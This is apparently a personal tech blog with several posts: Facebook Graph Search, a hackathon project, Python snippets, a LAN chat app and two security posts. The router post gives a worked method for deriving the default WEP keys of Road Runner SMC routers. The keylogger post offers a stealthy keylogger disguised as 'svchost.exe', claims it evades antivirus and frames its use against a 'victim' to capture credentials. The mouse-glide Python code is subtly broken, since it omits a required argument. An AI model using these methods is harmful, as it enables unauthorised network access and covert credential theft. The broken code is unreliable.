Graph Search: Facebook is Finally Useful

Facebook's Graph Search feature is amazing. I wanted to know which of my new acquaintances and friends from high school go to the university I'll be visiting for a hackathon next week. So, I just started typing my query in a natural way, "my friends who go to Carnegie Melon University", and bam -- I got exactly what I was looking for. No fumbling with drop down menu filters or long advanced search forms. It's like Wolfram Alpha for your intricate network of friends, family and acquaintances.

Of course, not everyone feels the same way about this feature.  Moreover, not everyone feels the same way about Facebook itself.  There's the highly debated issue of users being overly reliant on the online platform, to the point where it's unhealthy.  Critics of Facebook mock it as a tool for narcissists who couldn't care to remember who their friends are.

While I'm cautious of Facebook's potential to be used in a socially unhealthy way, I'm a firm believer that the data amassed by the network can be used to improve social life off the web.  I've made many acquaintances who I haven't yet had the luxury of learning everything about them.  I will probably remember them and the moments we shared together, but easily forget their name and the school they go to or their hometown. Facebook solves this problem.

However, the fact that Facebook wields so much power, that it single-handedly controls personal, and sometimes private information about nearly everyone, coupled with the perceived lack of transparency about what Facebook does with that data gives rise to the suspicion that they may have a nefarious agenda --  they may be exploiting this data by selling it to nosy corporations or giving direct access to snooping intelligence agencies like the NSA.  

By building Graph Search, Facebook has given me a reason to believe that the data it amassed doesn't have to be used for "evil" -- it can be used for good. Its collection, aggregation, and analysis of social data undoubtedly comes at the cost of privacy, but the insights gained are powerful and beneficial.

At the end of the day, Facebook is solving a complex problem: digesting the massive amount of data submitted voluntarily by hundreds of millions of people around the world, and making it useful.  They've done just that with Graph Search.

Morpheus

The following is an excerpt from my blog post in the Dwolla Blog where I recounted my experience at the largest hackathon in Texas, HackTX.

A screenshot from Morpheus.

Morpheus, whose name bears no relation to the well known leader in the human fight against dystopian robot overlords from The Matrix, but instead is named after the Greek god of dreams and sleep, is a platform that brings distributed computing to mobile devices.  Mobile devices, such as Apple and Android smartphones and tablets, are exponentially increasing in processing power.  If we consider the fact that in my pocket lies an HTC One which contains a 1.7 GHz quad-core Snapdragon processor, (which truly is mind-blowing, because the last time I shopped for computer components, a few years ago, Intel was just rolling out their first Quad Core processors and the world was going nuts over it) and we also consider that 80% of the time, my phone is resting idly in my pocket or missing underneath my bed, we realize that the true potential of its is being wasted 90% of the time.  The other 10% is wasted because I use my phone to check my Facebook news feed and text my buddies.  Now, imagine if your phone could instead be used to work in a cluster of other computing devices to tackle large computational problems, like those being solved by Folding@Home, a project that takes advantage of the powerful Playstation 3's gamers have sitting in their homes to simulate protein folding, design medical drugs, and understand molecular dynamics to save human lives.  The true power of Morpheus is realized when you consider that smartphones and tablets are growing in their ubiquity.  Think about the impact that billions of super-quick devices could have if they were used for a purpose greater than taking selfies and tweeting about what you're about to buy from the supermarket.

"But do you really think people will drain their battery just because of the philanthropic goodness of their hearts?"  you may be inclined to ask.  Morpheus answers this in two ways: a) participants only leave their phone to compute when charging at night, and b) researchers will pay participants, using Dwolla, for the work their phone does.  This brings an interesting twist to the Folding @ Home model, which relies on gamers to rack up their energy bill and subject their PS3 to computational slavery for nothing except the knowledge that they're doing good in this world.  With Morpheus, researchers and even commercial enterprises can leverage the immense power hidden away in everyone's pockets to solve their problems.  Imagine IBM renting your phone for the night so it can compute the Answer to Life, The Universe, and Everything in just a fraction of the 7.5 million years it took Deep Thought to do so.

The Morpheus team! 

So, in essence, you get paid while you sleep just for running a simple app on your phone during the night. This simple idea is mind-bogglingly cool and has a ton of potential to do good for the world. I'm hopeful that the Morpheus team, uTexas students Eduardo Saenz, Bulat Bazarbayev, Comyar Zaheri Brandon Lee, and Sudheesh Katkam, will take this beyond HackTX and launch this in the wild, real world. Very well done, gentlemen.

Python: Glide, instead of move, mouse cursor from one point to another

I couldn't find a function in pywin32 to smoothly glide a pointer from one point to another, instead of simply "moving" the cursor by making it jump from its current position to a given position.  I needed a way to make the mouse sort of "glide" from point A to point B at a seemingly natural pace, so here's my solution:

import time
import win32api

MOUSE_SPEED = .4 #seconds

def mouse_glide_to(x,y):
    """Smooth glides mouse from current position to point x,y with default timing and speed"""
    x1,y1 = win32api.GetCursorPos()
    smooth_glide_mouse(x1,y1, x, y, MOUSE_SPEED)

def smooth_glide_mouse(x1,y1,x2,y2, t, intervals):
    """Smoothly glides mouse from x1,y1, to x2,y2 in time t using intervals amount of intervals"""
    distance_x = x2-x1
    distance_y = y2-y1
    for n in range(0, intervals+1):
        move_mouse(x1 + n * (distance_x/intervals), y1 + n * (distance_y/intervals))
        time.sleep(t*1.0/intervals)

def move_mouse(x, y):
    win32api.SetCursorPos((x,y))

mouse_glide_to(x,y) will move the cursor from its current position to point (x,y) in MOUSE_SPEED seconds. It works perfectly!

Road Runner (SMC Networks) routers - practically NO security

Upon registering for Time Warner's Road Runner internet service, customers are offered a router manufactured by SMC Networks.  The router ships with WEP encryption enabled by default, using a 128-bit key based on its MAC address.   While WEP encryption is already the most insecure form of wireless encryption out there,  SMC Networks amplifies this weakness further by not generating a random WEP key; something which a home user almost never changes unless forced to do so during first time installation, whether it is because he or she is ignorant about the risks of a vulnerable network, or because he or she simply doesn't know how to or care enough to change it.  While a randomly generated WEP key can be defeated just as easily as any other, the default encryption key for these routers is trivial and can be determined just by spotting it in a regular AP (Access Point) scan of the area.

The encryption key can be discovered in seconds, without the need for conventional wireless cracking tools such as the aircrack-ng suite. These routers effectively have no security whatsoever, as even the most tech-challenged of computer users can break into them.  From there, the users of the network are vulnerable to all kinds of harm, ranging from innocent piggy-backing to malware and identity theft.

In under a minute, one can find the key using only the router's wireless network name (SSID) and its wireless MAC address (BSSID).  These routers stick out like a sore thumb because their SSIDs are simply 4 hex characters (e.g. 'D78A') and their MAC addresses typically begin with 00:26:F3, 00:22:2D, or 78:CD:8E (OUI). 

Here's how:

In this example, let's assume we see a router whose SSID is '4B5F' and whose wireless MAC address is 00:26:F3:73:4B:52. The WEP key is generated in this format:

[first 10 characters of MAC] + [last two characters of SSID] + 14 0's

Following this format, we take the first 10 hex digits (or first 5 octets) of the MAC address, which we can easily find when performing a normal everyday wireless scan in Windows or OS X: "00:26:F3:73:4B", append the last two digits of the SSID: "5F", and tack on 14 0's to form the router's 128-bit encryption key:

00:26:F3:73:4B:5F:00:00:00:00:00:00:00

Knowing this, any joe-shmo can "hack" into an Road Runner SMC-Networks router with just a smartphone and optionally a pen and paper.  I would highly recommend that either SMC Networks or Road Runner move on to WPA2 encryption in their new routers and attempt to update these routers to use WPA2.  New Verizon FiOS Actiontec routers come factory default with WPA2 enabled with a randomly generated 32 character string and WPS disabled; they could learn something from Verizon!

EDIT: Apparently, the insecurity of these routers was already covered in an article from 2009; it's sad to see nothing has been done about it since then!  

"However, the Time Warner devices come pre-configured and locked, with URL blocking being the only feature available to the customer through the web administration interface."

According to the article, the router's web administration is locked and the home user cannot change the encryption scheme nor the encryption key, even if he or she wanted to.  This is definitely a huge issue.  

Python: Calculating the average color of an area of an image (PIL)

Here's a snippet of code I whipped up in Python to calculate the the average color of a square shaped area of an image.  I used the Python Imaging Library (PIL) to load the image, so be sure to have it available if you're using this.

import Image

def get_average_color((x,y), n, image):
    """ Returns a 3-tuple containing the RGB value of the average color of the
    given square bounded area of length = n whose origin (top left corner) 
    is (x, y) in the given image"""

    r, g, b = 0, 0, 0
    count = 0
    for s in range(x, x+n+1):
        for t in range(y, y+n+1):
            pixlr, pixlg, pixlb = image[s, t]
            r += pixlr
            g += pixlg
            b += pixlb
            count += 1
    return ((r/count), (g/count), (b/count))

image = Image.open('test.png').load()
r, g, b = get_average_color((24,290), 50, image)
print r,g,b

This is great for detecting the color of an area of an animated and constantly changing game screen, where finding the color of a single pixel may not be accurate enough for your needs.

Simple Keylogger in VB .NET

This is a basic keylogger I wrote in VB.NET a few months ago.  It can be hidden by pressing the key combination CTRL+SHIFT+S (pressing it will toggle the display of the keylogger control panel), and has an inconspicuous process name "svchost.exe"  Upon exit, it will dump its keystroke log to C:\ntklr.sys and make the file hidden.  If you do not have permission to write to that directory, or would like to save the log using a different file name, you can select a different directory and path after checking the "Write to file?" checkbox.

This free, easy to use, and open source application does not raise any flags with popular anti-viruses as of right now, according to this report from VirusTotal, a service that scans a file through 40+ popular anti-virus products.  

To use, simply:

1. Check the "Write to file?" checkbox and select a path (or use the default path), then click Open.
2. Click the Start button to start keylogging.
3. Press the key combination CTRL+SHIFT+S (all at once) to conceal the window.  ("stealth" mode)
4. Press some keys, or wait for the victim to type something.
5. Whenever you want, hit CTRL+SHIFT+S again to bring the window back and view the log.  Exit the application or hit End to make it write the log to the log file you specified.  
6. Open the logfile to view keystrokes.  This file is hidden, so make sure you have Show hidden files enabled in Windows Explorer to find it.

Victim logs in

credentials captured ;)

If you would like to improve or modify this application, feel free to use the provided source code!  It requires the .NET Framework 4.0 redistributable package to be installed in order to run.

Binary (.exe): Download

.NET 4.0 redistributable package: Download

Source: GitHub repo

SomewhatSecureChat - Chat with another computer on your network!

This free, simple chat application that will allow you to securely chat with another computer on your LAN (on your local network, though it could work over the internet but not without some changes to account for NAT - like port fowarding).  It was written in VB .NET, so you'll need the .NET framework installed in order to use it.  Click here to download it.

Both parties will need to have this application running (and listening) in order to chat.   Simply agree on a mutual password and record your friend's listening port number and IP address, and you'll be chatting in no time!  Somewhat Secure Chat is only for Windows.  This easy to use application is free and open-source; feel free to improve and distribute this program!

Binary (.exe): Download

Required .NET framework 4.0 installer: Download

Source: GitHub Repo